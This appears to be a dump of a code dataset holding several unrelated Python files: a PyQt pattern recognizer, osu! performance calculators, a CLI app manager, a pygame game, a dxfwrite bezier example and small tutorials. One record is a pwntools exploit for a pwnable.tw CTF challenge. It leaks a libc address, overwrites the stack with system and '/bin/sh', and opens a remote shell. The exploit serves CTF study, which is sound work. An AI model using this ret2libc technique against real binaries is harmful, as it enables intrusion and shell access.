QtGui.QPushButton(self.trUtf8(\"Iniciar treinamento\"))\n\t\tself.btnTrain.clicked.connect(self.doTrain)\n\t\t\n\t\tself.btnSaveTrain = QtGui.QPushButton(self.trUtf8(\"Salvar treinamento\"))\n\t\tself.btnSaveTrain.clicked.connect(self.doSaveTrain)\n\n\t\tbuttonBarLayout.addWidget(self.btnTrain)\n\t\tbuttonBarLayout.addWidget(self.btnSaveTrain)\n\t\tbuttonBar.setLayout(buttonBarLayout)\n\n\t\tlayout.addWidget(buttonBar)\n\n\t\tself.progressBar = QtGui.QProgressBar()\n\t\tlayout.addWidget(self.progressBar)\n\t\t\n\t\ttrainScreen.setLayout(layout)\n\n\t\treturn trainScreen\n\t\n\tdef buildRecognizeScreen(self):\n\t\trecognizeScreen = QtGui.QGroupBox(self.trUtf8(\"Reconhecimento\"))\n\n\t\tlayout = QtGui.QVBoxLayout()\n\n\t\tform = QtGui.QWidget()\n\t\tformLayout = QtGui.QFormLayout()\n\t\n\t\tfileInput = QtGui.QWidget()\n\t\tfileInputLayout = QtGui.QHBoxLayout()\n\t\tself.txtRecogFilePath = QtGui.QLineEdit()\n\t\tself.btnRecogSelectFile = QtGui.QPushButton(self.trUtf8(\"Arquivo...\"))\n\t\tself.btnRecogSelectFile.clicked.connect(self.selectFileTrain)\n\t\tfileInputLayout.addWidget(self.txtRecogFilePath)\n\t\tfileInputLayout.addWidget(self.btnRecogSelectFile)\n\t\tfileInput.setLayout(fileInputLayout)\n\t\tformLayout.addRow(self.trUtf8(\"Arquivo de treinamento: \"), fileInput)\n\n\t\tform.setLayout(formLayout)\n\t\tlayout.addWidget(form)\n\n\t\tself.btnLoadTrainFile = QtGui.QPushButton(self.trUtf8(\"Carregar treinamento selecionado\"))\n\t\tself.btnLoadTrainFile.clicked.connect(self.loadTrain)\n\t\tlayout.addWidget(self.btnLoadTrainFile)\n\n\t\tself.lblLoadedTrain = QtGui.QLabel(self.trUtf8(\"Não há treinamento carregado!\"))\n\t\tself.lblLoadedTrain.setStyleSheet(\"QLabel { color: red; font-style: italic; }\")\n\t\tlayout.addWidget(self.lblLoadedTrain)\n\n\t\tself.buttonPadList = []\n\t\tbuttonPadLayout = QtGui.QGridLayout()\n\n\t\tfor j in range(RecognizerWindow.LIN_QTY):\n\t\t\tline = []\n\t\t\tfor i in range(RecognizerWindow.COL_QTY):\n\t\t\t\tbutton = QtGui.QPushButton()\n\t\t\t\tbutton.setCheckable(True)\n\t\t\t\tbutton.setMaximumSize(30,30)\n\t\t\t\tbutton.setStyleSheet(\"QPushButton:checked { background-color: navy; }\")\n\t\t\t\tline.append(button)\n\t\t\t\tbuttonPadLayout.addWidget(button, j, i)\n\t\t\n\t\t\tself.buttonPadList.append(line)\n\n\t\tbuttonPad = QtGui.QWidget()\n\t\tbuttonPad.setLayout(buttonPadLayout)\n\t\tlayout.addWidget(buttonPad)\n\n\t\tself.btnRecogPattern = QtGui.QPushButton(self.trUtf8(\"Reconhecer padrão\"))\n\t\tself.btnRecogPattern.clicked.connect(self.recognize)\n\t\tlayout.addWidget(self.btnRecogPattern)\n\n\t\tresultBox = QtGui.QWidget()\n\t\tresultLayout = QtGui.QVBoxLayout()\n\t\tself.lblResultText = QtGui.QLabel(self.trUtf8(\"Resultado\"))\n\t\tresultLayout.addWidget(self.lblResultText)\n\n\t\tself.lblResult = QtGui.QLabel()\n\t\tself.lblResult.setStyleSheet(\"QLabel { font-size: 40px; color: orange; }\")\n\t\tresultLayout.addWidget(self.lblResult)\n\t\tresultBox.setLayout(resultLayout)\n\n\t\tlayout.addWidget(resultBox)\n\n\t\trecognizeScreen.setLayout(layout)\n\n\t\treturn recognizeScreen\n\n\tdef buildMainScreen(self):\n\t\tmainScreen = QtGui.QVBoxLayout()\n\n\t\tmainScreen.addWidget(self.buildTrainScreen())\n\t\tmainScreen.addWidget(self.buildRecognizeScreen())\n\n\t\treturn mainScreen\n\n\tdef selectFilePatt(self):\n\t\tfilename = QtGui.QFileDialog.getOpenFileName(self,\\\n\t\t\tself.trUtf8(\"Selecionar arquivo\"), \"\",\\\n\t\t\tself.trUtf8(\"Text files (*.txt)\"))\n\n\t\tif filename:\n\t\t\tself.txtFilePath.setText(filename[0])\n\t\n\tdef selectFileTrain(self):\n\t\tfilename = QtGui.QFileDialog.getOpenFileName(self,\\\n\t\t\tself.trUtf8(\"Selecionar arquivo\"), \"\",\\\n\t\t\tself.trUtf8(\"Train files (*.trn)\"))\n\n\t\tif filename:\n\t\t\tself.txtRecogFilePath.setText(filename[0])\n\t\n\tdef doTrain(self):\n\t\tnumberIterations = self.txtNumIterations.value()\n\t\tself.progressBar.reset()\n\t\tself.progressBar.setRange(0, numberIterations - 1)\n\t\tself.neuralNet.train(self.txtFilePath.text(), self.txtNumNeurons.value(),\\\n\t\t\tself.txtLearningRate.value(), numberIterations,\tself.progressBar)\n\n\t\tself.trained = True\n\t\tself.updateLabelTrain()\n\n\tdef doSaveTrain(self):\n\t\tfilename = QtGui.QFileDialog.getSaveFileName(self,\\\n\t\t\tself.trUtf8(\"Salvar treinamento\"), \"\", \\\n\t\t\tself.trUtf8(\"Train files (*.trn)\"))\n\n\t\tnetFileName = filename[0]\n\t\tif filename\\\n\t\t\tand netFileName.find(\".trn\") == len(netFileName) - 4:\n\t\t\tnetFileName = netFileName + \".trn\"\n\n\t\tself.neuralNet.exportNet(netFileName)\n\t\n\tdef loadTrain(self):\n\t\tfilename = self.txtRecogFilePath.text()\n\n\t\tif filename:\n\t\t\tself.neuralNet.importNet(filename)\n\n\t\tself.trained = True\n\t\tself.updateLabelTrain()\n\t\n\tdef recognize(self):\n\t\tif self.trained:\n\t\t\tpattern = StringIO.StringIO()\n\n\t\t\tfor l in self.buttonPadList:\n\t\t\t\tfor item in l:\n\t\t\t\t\tif item.isChecked():\n\t\t\t\t\t\tpattern.write(\"1\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tpattern.write(\"0\")\n\n\t\t\tres = self.neuralNet.recognize(pattern.getvalue())\n\t\t\tpattern.close()\n\n\t\t\tself.lblResult.setText(self.answers.get(res))\n\t\n\tdef updateLabelTrain(self):\n\t\tif self.trained:\n\t\t\tself.lblLoadedTrain.setText(self.trUtf8(\"Treinamento carregado!\"))\n\t\t\tself.lblLoadedTrain.setStyleSheet(\" QLabel { color: navy; font-weight: bold; }\")\n\nif __name__ == \"__main__\":\n\tapp = QtGui.QApplication(sys.argv)\n\n\tr = RecognizerWindow()\n\tr.show()\n\n\tapp.exec_()\n\tsys.exit()\n","repo_name":"stormqueen1990/plate-recognizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"42895895001","text":"from pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\ncontext.terminal = ['tmux', 'splitw', '-h']\n\np = remote('chall.pwnable.tw', 10101)\n#p = process('./dubblesort')\nelf = ELF('./dubblesort')\nlibc = ELF('./libc_32.so.6')\n\np.recvuntil(b':')\np.sendline(b'a' * 28)\n\np.recvline()\nlibc_base = u32(b'\\x00' + p.recv(3)) - 0x1b0000\nprint('libc base:', hex(libc_base))\n\nsystem = libc_base + libc.symbols['system']\nbin_sh = libc_base + next(libc.search(b'/bin/sh'))\n\np.recvuntil(b':')\np.sendline(str(24 + 1 + 9 + 1))\nfor i in range(24):\n p.recvuntil(b'number :')\n p.sendline(b'0')\n\np.recvuntil(b'number :')\np.sendline(b'+')\n\nfor i in range(9):\n p.recvuntil(b'number :')\n p.sendline(str(system))\n\np.recvuntil(b'number :')\np.sendline(str(bin_sh))\n\np.interactive()","repo_name":"qingwei4/CTF-Solve","sub_path":"pwnable_tw_dubblesort/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32631984717","text":"from __future__ import annotations\n\nimport math\nfrom typing import Optional\nfrom typing import TypedDict\n\ntry: # TODO: ask asottile about this\n from oppai_ng.oppai import OppaiWrapper\nexcept ModuleNotFoundError:\n pass # utils will handle this for us\n\nfrom peace_performance_python.objects import Beatmap as PeaceMap\nfrom peace_performance_python.objects import Calculator as PeaceCalculator\n\n\nclass DifficultyRating(TypedDict):\n performance: float\n star_rating: float\n\n\nclass StdTaikoCatchScore(TypedDict):\n mods: Optional[int]\n acc: Optional[float]\n combo: Optional[int]\n nmiss: Optional[int]\n\n\nclass ManiaScore(TypedDict):\n mods: Optional[int]\n score: Optional[int]\n\n\ndef calculate_performances_std(\n osu_file_path: str,\n scores: list[StdTaikoCatchScore],\n) -> list[DifficultyRating]:\n with OppaiWrapper() as calculator:\n calculator.set_mode(0)\n\n results: list[DifficultyRating] = []\n\n for score in scores:\n if score[\"mods\"] is not None:\n calculator.set_mods(score[\"mods\"])\n\n if score[\"nmiss\"] is not None:\n calculator.set_nmiss(score[\"nmiss\"])\n\n if score[\"combo\"] is not None:\n calculator.set_combo(score[\"combo\"])\n\n if score[\"acc\"] is not None:\n calculator.set_accuracy_percent(score[\"acc\"])\n\n calculator.calculate(osu_file_path)\n\n pp = calculator.get_pp()\n sr = calculator.get_sr()\n\n if math.isnan(pp) or math.isinf(pp):\n # TODO: report to logserver\n pp = 0.0\n sr = 0.0\n else:\n pp = round(pp, 5)\n\n results.append(\n {\n \"performance\": pp,\n \"star_rating\": sr,\n },\n )\n\n return results\n\n\ndef calculate_performances_taiko(\n osu_file_path: str,\n scores: list[StdTaikoCatchScore],\n) -> list[DifficultyRating]:\n beatmap = PeaceMap(osu_file_path) # type: ignore\n\n results: list[DifficultyRating] = []\n\n for score in scores:\n calculator = PeaceCalculator(\n {\n \"mode\": 1,\n \"mods\": score[\"mods\"],\n \"acc\": score[\"acc\"],\n \"combo\": score[\"combo\"],\n \"nmiss\": score[\"nmiss\"],\n },\n )\n\n result = calculator.calculate(beatmap)\n\n pp = result.pp\n sr = result.stars\n\n if math.isnan(pp) or math.isinf(pp):\n # TODO: report to logserver\n pp = 0.0\n sr = 0.0\n else:\n pp = round(pp, 5)\n\n results.append(\n {\n \"performance\": pp,\n \"star_rating\": sr,\n },\n )\n\n return results\n\n\ndef calculate_performances_catch(\n osu_file_path: str,\n scores: list[StdTaikoCatchScore],\n) -> list[DifficultyRating]:\n beatmap = PeaceMap(osu_file_path) # type: ignore\n\n results: list[DifficultyRating] = []\n\n for score in scores:\n calculator = PeaceCalculator(\n {\n \"mode\": 2,\n \"mods\": score[\"mods\"],\n \"acc\": score[\"acc\"],\n \"combo\": score[\"combo\"],\n \"nmiss\": score[\"nmiss\"],\n },\n )\n\n result = calculator.calculate(beatmap)\n\n pp = result.pp\n sr = result.stars\n\n if math.isnan(pp) or math.isinf(pp):\n # TODO: report to logserver\n pp = 0.0\n sr = 0.0\n else:\n pp = round(pp, 5)\n\n results.append(\n {\n \"performance\": pp,\n \"star_rating\": sr,\n },\n )\n\n return results\n\n\ndef calculate_performances_mania(\n osu_file_path: str,\n scores: list[ManiaScore],\n) -> list[DifficultyRating]:\n beatmap = PeaceMap(osu_file_path) # type: ignore\n\n results: list[DifficultyRating] = []\n\n for score in scores:\n calculator = PeaceCalculator(\n {\n \"mode\": 3,\n \"mods\": score[\"mods\"],\n \"score\": score[\"score\"],\n },\n )\n\n result = calculator.calculate(beatmap)\n\n pp = result.pp\n sr = result.stars\n\n if math.isnan(pp) or math.isinf(pp):\n # TODO: report to logserver\n pp = 0.0\n sr = 0.0\n else:\n pp = round(pp, 5)\n\n results.append(\n {\n \"performance\": pp,\n \"star_rating\": sr,\n },\n )\n\n return results\n\n\nclass ScoreDifficultyParams(TypedDict, total=False):\n # std, taiko, catch\n acc: float\n combo: int\n nmiss: int\n\n # mania\n score: int\n\n\ndef calculate_performances(\n osu_file_path: str,\n mode: int,\n mods: Optional[int],\n scores: list[ScoreDifficultyParams],\n) -> list[DifficultyRating]:\n if mode in (0, 1, 2):\n std_taiko_catch_scores: list[StdTaikoCatchScore] = [\n {\n \"mods\": mods,\n \"acc\": score.get(\"acc\"),\n \"combo\": score.get(\"combo\"),\n \"nmiss\": score.get(\"nmiss\"),\n }\n for score in scores\n ]\n\n if mode == 0:\n results = calculate_performances_std(\n osu_file_path=osu_file_path,\n scores=std_taiko_catch_scores,\n )\n elif mode == 1:\n results = calculate_performances_taiko(\n osu_file_path=osu_file_path,\n scores=std_taiko_catch_scores,\n )\n elif mode == 2:\n results = calculate_performances_catch(\n osu_file_path=osu_file_path,\n scores=std_taiko_catch_scores,\n )\n\n elif mode == 3:\n mania_scores: list[ManiaScore] = [\n {\n \"mods\": mods,\n \"score\": score.get(\"score\"),\n }\n for score in scores\n ]\n\n results = calculate_performances_mania(\n osu_file_path=osu_file_path,\n scores=mania_scores,\n )\n else:\n raise NotImplementedError\n\n return results\n","repo_name":"divinity1437/bancho.py","sub_path":"app/usecases/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"20126067111","text":"# -*- coding: utf-8 -*-\n\"\"\"Main command line application.\n\nAttributes\n----------\ndocopt_doc : str\n Used to store/define the docstring that will be passed to docopt as the \"doc\" argument.\nroot_folder : str\n The main folder containing the application. All commands must be executed from this location\n without exceptions.\n\"\"\"\n\nimport os\nimport sys\n\nfrom . import app_utils\nfrom .__init__ import __appdescription__\nfrom .__init__ import __appname__\nfrom .__init__ import __status__\nfrom .__init__ import __version__\nfrom .python_utils import cli_utils\n\nroot_folder = os.path.realpath(os.path.abspath(os.path.join(\n os.path.normpath(os.path.join(os.path.dirname(__file__), *([os.pardir] * 2))))))\n\ndocopt_doc = \"\"\"{appname} {version} ({status})\n\n{appdescription}\n\nUsage:\n app.py (-h | --help | --manual | --version)\n app.py app_repos (submodules | subtrees) (init | update)\n [-a ... | --app=...]\n [--dry-run]\n app.py bump_app_version [-a ... | --app=...]\n app.py gen_base_app\n app.py (gen_docs | gen_docs_no_api) [-f | --force-clean-build]\n [-u | --update-inventories]\n app.py gen_man_pages [-a ... | --app=...]\n app.py gen_readmes\n app.py gen_sys_exec_all\n app.py gen_sys_exec_self\n app.py install_deps [-a ... | --app=...]\n [-e | --pip-exec=]\n app.py print_all_apps\n app.py repo (submodules | subtrees) (init | update) [--dry-run]\n app.py run_cmd_on_app (-c | --command=)\n [-p | --parallel ]\n [-a ... | --app=...]\n app.py spacefm_find_files\n\nOptions:\n\n-h, --help\n Show this application basic help.\n\n--manual\n Show this application manual page.\n\n--version\n Show application version.\n\n-a, --app=\n Specify one or more application name to work with. If this option isn't\n specified on the commands that make use of it, the command will work with\n all available applications.\n\n-c , --command=\n Command to execute inside a managed application folder.\n\n--dry-run\n Do not perform file system changes. Only display messages informing of the\n actions that will be performed or commands that will be executed.\n\n-e , --pip-exec=\n For use with the **install_deps** command. Path or name of the **pip**\n command to use to install dependencies.\n\n-f, --force-clean-build\n Clear doctree cache and destination folder when building the documentation.\n\n-p, --parallel\n Run command in parallel instead of after finishing each command execution.\n\n-u, --update-inventories\n Update inventory files from their on-line resources when building the\n documentation. Inventory files will be updated automatically if they don't\n already exist.\n\n\"\"\".format(appname=__appname__,\n appdescription=__appdescription__,\n version=__version__,\n status=__status__)\n\n\nclass CommandLineInterface(cli_utils.CommandLineInterfaceSuper):\n \"\"\"Command line interface.\n\n It handles the arguments parsed by the docopt module.\n\n Attributes\n ----------\n a : dict\n Where docopt_args is stored.\n action : method\n Set the method that will be executed when calling CommandLineInterface.run().\n repo_action : str\n Which action to perform on a repository.\n \"\"\"\n action = None\n repo_action = None\n app_slugs = []\n\n def __init__(self, docopt_args):\n \"\"\"Initialize.\n\n Parameters\n ----------\n docopt_args : dict\n The dictionary of arguments as returned by docopt parser.\n \"\"\"\n self.a = docopt_args\n self._cli_header_blacklist = [\n self.a[\"spacefm_find_files\"],\n self.a[\"--manual\"],\n self.a[\"print_all_apps\"]\n ]\n\n super().__init__(__appname__, \"UserData/0_manager/logs\")\n\n self.app_slugs = list(set(self.a[\"--app\"]))\n\n if self.a[\"spacefm_find_files\"]:\n self.action = self.spacefm_find_files\n elif self.a[\"print_all_apps\"]:\n self.action = self.print_all_apps\n elif self.a[\"--manual\"]:\n self.action = self.display_manual_page\n elif self.a[\"bump_app_version\"]:\n self.logger.info(\"**Bumping applications' versions...**\")\n self.action = self.bump_versions\n elif self.a[\"gen_base_app\"]:\n self.logger.info(\"**New application generation...**\")\n self.action = self.generate_base_app\n elif self.a[\"gen_docs\"] or self.a[\"gen_docs_no_api\"]:\n self.logger.info(\"**Documentation generation...**\")\n self.action = self.generate_docs\n elif self.a[\"gen_man_pages\"]:\n self.logger.info(\"**Generating manual pages...**\")\n self.action = self.generate_man_pages\n elif self.a[\"gen_readmes\"]:\n self.logger.info(\"**Generating READMEs...**\")\n self.action = self.generate_readmes\n elif self.a[\"gen_sys_exec_all\"]:\n self.logger.info(\"**System executable generation for all applications...**\")\n self.action = self.system_executable_generation_all\n elif self.a[\"gen_sys_exec_self\"]:\n self.logger.info(\"**System executable generation...**\")\n self.action = self.system_executable_generation_self\n elif self.a[\"install_deps\"]:\n self.logger.info(\"**Installing dependencies...**\")\n self.action = self.install_dependencies\n elif self.a[\"run_cmd_on_app\"]:\n self.logger.info(\"**Running command on selected applications...**\")\n self.action = self.run_cmd_on_apps\n elif self.a[\"repo\"] or self.a[\"app_repos\"]:\n self.repo_action = \"init\" if self.a[\"init\"] else \"update\" if self.a[\"update\"] else \"\"\n\n if self.a[\"submodules\"]:\n if self.a[\"app_repos\"]:\n self.logger.info(\"**Managing application repositories sub-modules...**\")\n self.action = self.manage_app_repos_submodules\n elif self.a[\"repo\"]:\n self.logger.info(\"**Managing repository sub-modules...**\")\n self.action = self.manage_repo_submodules\n elif self.a[\"subtrees\"]:\n if self.a[\"app_repos\"]:\n self.logger.info(\"**Managing application repositories sub-trees...**\")\n self.action = self.manage_app_repos_subtrees\n elif self.a[\"repo\"]:\n self.logger.info(\"**Managing repository sub-trees...**\")\n self.action = self.manage_repo_subtrees\n\n def run(self):\n \"\"\"Execute the assigned action stored in self.action if any.\n \"\"\"\n if self.action is not None:\n self.action()\n sys.exit(0)\n\n def bump_versions(self):\n \"\"\"See :any:`app_utils.bump_versions`\n \"\"\"\n app_utils.bump_versions(self.app_slugs, logger=self.logger)\n\n def generate_base_app(self):\n \"\"\"See :any:`app_utils.BaseAppGenerator`\n \"\"\"\n base_app_generetor = app_utils.BaseAppGenerator(logger=self.logger)\n base_app_generetor.generate()\n\n def generate_docs(self):\n \"\"\"See :any:`sphinx_docs_utils.generate_docs`\n \"\"\"\n app_utils.generate_docs(generate_api_docs=self.a[\"gen_docs\"],\n update_inventories=self.a[\"--update-inventories\"],\n force_clean_build=self.a[\"--force-clean-build\"],\n logger=self.logger)\n\n def install_dependencies(self):\n \"\"\"See :any:`app_utils.install_dependencies`\n \"\"\"\n app_utils.install_dependencies(app_slugs=self.app_slugs,\n pip_exec=self.a[\"--pip-exec\"],\n logger=self.logger)\n\n def generate_readmes(self):\n \"\"\"See :any:`app_utils.generate_readmes`\n \"\"\"\n app_utils.generate_readmes(self.logger)\n\n def run_cmd_on_apps(self):\n \"\"\"See :any:`app_utils.run_cmd_on_apps`\n \"\"\"\n app_utils.run_cmd_on_apps(self.a[\"--command\"],\n run_in_parallel=self.a[\"--parallel\"],\n app_slugs=self.app_slugs,\n logger=self.logger)\n\n def system_executable_generation_self(self):\n \"\"\"See :any:`cli_utils.CommandLineInterfaceSuper._system_executable_generation`.\n \"\"\"\n self._system_executable_generation(\n exec_name=\"apps-manager-cli\",\n app_root_folder=root_folder,\n sys_exec_template_path=os.path.join(\n root_folder, \"AppData\", \"data\", \"templates\", \"system_executable\"),\n bash_completions_template_path=os.path.join(\n root_folder, \"AppData\", \"data\", \"templates\", \"bash_completions.bash\"),\n logger=self.logger\n )\n\n def system_executable_generation_all(self):\n \"\"\"See :any:`app_utils.system_executable_generation_for_all_apps`\n \"\"\"\n app_utils.system_executable_generation_for_all_apps(logger=self.logger)\n\n def manage_repo_submodules(self):\n \"\"\"See :any:`git_utils.manage_repo`\n \"\"\"\n from .python_utils import git_utils\n\n git_utils.manage_repo(\n \"submodule\",\n self.repo_action,\n cwd=root_folder,\n dry_run=self.a[\"--dry-run\"],\n logger=self.logger\n )\n\n def manage_repo_subtrees(self):\n \"\"\"See :any:`git_utils.manage_repo`\n \"\"\"\n self.logger.warning(\"**Not using sub-trees in this application for now.**\")\n\n def manage_app_repos_submodules(self):\n \"\"\"See :any:`git_utils.manage_repo`\n \"\"\"\n self.logger.warning(\"**Not using sub-modules in applications for now.**\")\n\n def manage_app_repos_subtrees(self):\n \"\"\"See :any:`git_utils.manage_repo`\n \"\"\"\n app_utils.manage_app_repos_subtrees(self.repo_action,\n app_slugs=self.app_slugs,\n dry_run=self.a[\"--dry-run\"],\n logger=self.logger)\n\n def display_manual_page(self):\n \"\"\"See :any:`cli_utils.CommandLineInterfaceSuper._display_manual_page`.\n \"\"\"\n self._display_manual_page(os.path.join(root_folder, \"AppData\", \"data\", \"man\", \"app.py.1\"))\n\n def generate_man_pages(self):\n \"\"\"See :any:`app_utils.generate_man_pages`\n \"\"\"\n app_utils.generate_man_pages(app_slugs=self.app_slugs,\n logger=self.logger)\n\n def print_all_apps(self):\n \"\"\"See :any:`app_utils.print_all_apps`\n \"\"\"\n app_utils.print_all_apps()\n\n def spacefm_find_files(self):\n \"\"\"See :any:`app_utils.spacefm_find_files`\n \"\"\"\n app_utils.spacefm_find_files()\n\n\ndef main():\n \"\"\"Initialize command line interface.\n \"\"\"\n cli_utils.run_cli(flag_file=\".cli-applications-manager.flag\",\n docopt_doc=docopt_doc,\n app_name=__appname__,\n app_version=__version__,\n app_status=__status__,\n cli_class=CommandLineInterface)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"Odyseus/CLIApplicationsManager","sub_path":"AppData/python_modules/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":11431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33780004081","text":"c = input(\"ievadi, lūdzu kartec numuru: \")\nc1 = list(c)\n\nif c1[0] ==\"4\":\n print(\"VISA\")\nelif c1[0]==\"5\":\n print(\"Mastercard\")\nelif c1[0]==\"3\":\n print(\"American Express\")\n\nelse:\n print(\"Card NOT valid\")\n\n\n","repo_name":"AleksandrZelukin/macibu_programmas","sub_path":"10kl_progs/credit_card.py","file_name":"credit_card.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36366428259","text":"import pygame, sys\r\nfrom pygame.locals import *\r\nimport math \r\nimport time\r\nimport random\r\npygame.init()\r\n\r\ngreen=(10,200,10)\r\nred=(255,0,0)\r\n\r\ndisplay=pygame.display.set_mode((1000,600))\r\npygame.display.set_caption(\"Pangolin\")\r\npanimage=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/pangolin.png\")\r\nbackground=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/forest.jpg\")\r\npangolin_width=64\r\n\r\n\r\n\r\n\r\ndef food(ant_startx,ant_starty,ant):\r\n\tif ant==0:\r\n\t\tant_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/ant1.jpg\")\r\n\tif ant==1:\r\n\t\tant_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/ant2.jpg\")\r\n\tif ant==2:\r\n\t\tant_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/ant3.jpg\")\r\n\tdisplay.blit(ant_come,(ant_startx,ant_starty)) \r\n\r\ndef hunterx(hunter_startx,hunter_starty,hunter):\r\n\tif hunter==0:\r\n\t\thunter_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/hunter.jpg\")\r\n\tif hunter==1:\r\n\t\thunter_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/trap.png\")\r\n\tif hunter==2:\r\n\t\thunter_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/nettrap.png\")\r\n\r\n\tdisplay.blit(hunter_come,(hunter_startx,hunter_starty))\t\t\r\n\r\nfont=pygame.font.Font(\"freesansbold.ttf\",32)\r\nax=10\r\nay=10\r\n\r\nscore_value = 0\r\ndef show_score(score_x,score_y):\r\n\tscore=font.render(\"SCORE: \" + str(score_value), True, (255,255,255))\r\n\tdisplay.blit(score,(score_x,score_y))\r\n\r\ndef death():\r\n\tmessage_display(\"Oops!\")\r\n\r\ndef message_display(text):\r\n\tlargetext=pygame.font.Font(\"freesansbold.ttf\",80)\r\n\ttextsurf,textrect=text_object(text,largetext)\r\n\ttextrect.center=((400),(300))\r\n\tdisplay.blit(textsurf,textrect)\r\n\tpygame.display.update()\r\n\ttime.sleep(3)\r\n\tloop()\r\n\r\ndef text_object(text,font):\r\n\ttextsurface=font.render(text,True,red)\r\n\treturn textsurface,textsurface.get_rect()\r\n\r\n\r\ndef pangolin(x,y):\r\n\tdisplay.blit(panimage, (x,y))\r\n\r\ndef loop():\r\n\r\n\tx=500\r\n\ty=500\r\n\tx_change=0\r\n\ty_change=0\r\n\thunter_speed=5\r\n\thunter=0\r\n\thunter_startx=random.randrange(130,(1000-pangolin_width))\r\n\thunter_starty=-600\r\n\thunter_width=28\r\n\thunter_height=50\r\n\tant_speed=5\r\n\tant=0\r\n\tant_startx=random.randrange(130,(1000-pangolin_width))\r\n\tant_starty=-600\r\n\tant_width=20\r\n\tant_height=20\r\n\r\n\r\n\r\n\tbumped=False\r\n\twhile not bumped:\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type==pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tquit()\r\n\r\n\t\tkeys = pygame.key.get_pressed()\r\n\t\tif keys[pygame.K_LEFT] and x>0:\r\n\t\t\tx-=5\r\n\t\tif keys[pygame.K_RIGHT] and x<1000-pangolin_width: \r\n\t\t\tx+=5\r\n\r\n\t\tdisplay.fill(green)\r\n\t\tdisplay.blit(background,(0,0))\r\n\t\thunter_starty-=(hunter_speed/4)\r\n\t\thunterx(hunter_startx,hunter_starty,hunter)\r\n\t\thunter_starty+=hunter_speed\r\n\t\tant_starty-=(ant_speed/4)\r\n\t\tfood(ant_startx,ant_starty,ant)\r\n\t\tant_starty+= ant_speed\r\n\t\tpangolin(x,y)\r\n\t\tif x<0 or x>1000-pangolin_width:\r\n\t\t\tx_change=0\r\n\t\tif ant_starty>600:\r\n\t\t\tant_starty=0-ant_height\r\n\t\t\tant_startx=random.randrange(130,(1000-300))\r\n\t\t\tant=random.randrange(0,2)\r\n\t\tif hunter_starty>600:\r\n\t\t\thunter_starty=0-hunter_height\r\n\t\t\thunter_startx=random.randrange(130,(1000-300))\r\n\t\t\thunter=random.randrange(0,2)\r\n\r\n\t\tif y= hunter_startx and x <= hunter_startx + hunter_width:\r\n\t\t\t\tdeath() \r\n\t\t\tif x + pangolin_width >= hunter_startx and x + pangolin_width <= hunter_width + hunter_startx:\r\n\t\t\t\tdeath()\r\n\t\t\tif x < hunter_startx and hunter_startx + hunter_width < x + pangolin_width:\r\n\t\t\t\tdeath()\r\n\t\r\n\t\tif y\"\r\n\r\nimport sys\r\nimport os\r\n\r\ntry:\r\n import dxfwrite\r\nexcept ImportError:\r\n # if dxfwrite is not 'installed' append parent dir of __file__ to sys.path\r\n import os\r\n curdir = os.path.dirname(os.path.abspath(__file__))\r\n sys.path.insert(0, os.path.abspath(os.path.join(curdir, os.path.pardir)))\r\n\r\nimport dxfwrite\r\nfrom dxfwrite import DXFEngine as dxf\r\nfrom dxfwrite.vector2d import vadd\r\n\r\ndef draw_control_point(point, tangent1, tangent2=(0, 0)):\r\n tp1 = vadd(point, tangent1)\r\n tp2 = vadd(point, tangent2)\r\n dwg.add(dxf.circle(0.05, center=point, color=1))\r\n dwg.add(dxf.line(point, tp1, color=2))\r\n dwg.add(dxf.line(point, tp2, color=2))\r\n\r\nname = 'bezier.dxf'\r\ndwg = dxf.drawing(name)\r\nbezier = dxf.bezier(color=4)\r\ndwg.add(bezier)\r\n\r\n# define start point\r\nbezier.start((2, 4), tangent=(0, 2))\r\ndraw_control_point((2, 4), (0, 2))\r\n\r\n# append first point\r\nbezier.append((6, 7), tangent1=(-2, 0), tangent2=(1, 2))\r\ndraw_control_point((6, 7), (-2, 0), (1, 2))\r\n\r\n# tangent2 = -tangent1 = (+2, 0)\r\nbezier.append((12, 5), tangent1=(-2, 0))\r\ndraw_control_point((12, 5), (-2, 0), (2, 0))\r\n\r\n# for last point tangent2 is meaningless\r\nbezier.append((16, 9), tangent1=(-0.5, -3))\r\ndraw_control_point((16, 9), (-0.5, -3))\r\ndwg.save()\r\nprint(\"drawing '%s' created.\\n\" % name)\r\n","repo_name":"mozman/dxfwrite","sub_path":"examples/bezier.py","file_name":"bezier.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"39"} +{"seq_id":"11889819667","text":"# type casting = convert the data type of value to another data type\n\nx = 1 #int\ny = 2.0 #float\nz = \"3\" #str\n\nx = int(x)\ny = int(y)\nz = int(z)\n\n# 1\n# 2\n# 9\n\nx = float(x)\ny = float(y)\nz = float(z)\n\n# 1.0\n# 2.0\n# 9.0\n\nx = str(x)\ny = str(y)\nz = str(z)\n\n# 1\n# 2.0\n# 